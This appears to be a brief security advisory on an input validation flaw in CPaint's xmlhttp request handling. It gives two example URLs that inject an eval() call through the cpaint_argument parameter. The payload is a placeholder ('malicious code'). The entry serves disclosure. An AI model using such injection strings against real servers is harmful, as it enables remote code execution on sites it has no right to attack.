CPaint xmlhttp Request Input Validation Vulnerability

CPaint xmlhttp Request Input Validation Vulnerability

No exploit code is required.

The following examples were provided:

calculator.asp?cpaint_function=addNumbers&cpaint_argument[]=1&cpaint_argument[]=2")%20%26%20eval("malicious code

http://someserver.com/cpaintfile.asp?cpaint_function=response.write&cpaint_argument[]=2")%20%26%20eval("malicious code